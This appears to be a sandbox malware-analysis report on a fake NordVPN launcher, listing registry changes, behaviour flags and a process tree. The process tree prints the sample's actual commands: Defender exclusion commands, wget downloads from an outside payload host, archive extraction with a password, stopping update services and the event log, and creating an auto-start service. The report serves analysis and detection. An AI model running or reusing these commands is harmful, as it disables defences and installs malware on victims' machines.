Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.3 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.11 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceId = "0018000E55B401FA" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.1 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|3" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.5 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1120 wrote to memory of 1964 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 2552 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\Panda Free Antivirus - Free download and software reviews - CNET Download.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffbb84d9758,0x7ffbb84d9768,0x7ffbb84d9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4532 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5032 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4972 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3984 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5356 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4592 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5100 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3676 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3088 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3148 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4628 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5972 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6136 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe

"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\plugin3944

C:\Users\Admin\AppData\Roaming\services\plugin3944

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2236 -ip 2236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 628

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1760 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Users\Admin\AppData\Roaming\services\2plugin2958

C:\Users\Admin\AppData\Roaming\services\2plugin2958

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin0324

C:\Users\Admin\AppData\Roaming\services\3plugin0324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 4432

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1236

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "OZLCSUZD"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1324

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "OZLCSUZD"

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5492 -ip 5492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 600

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\dwm.exe

dwm.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5348 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4992 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 524

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4512 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 844

C:\Windows\SysWOW64\WerFault.exe

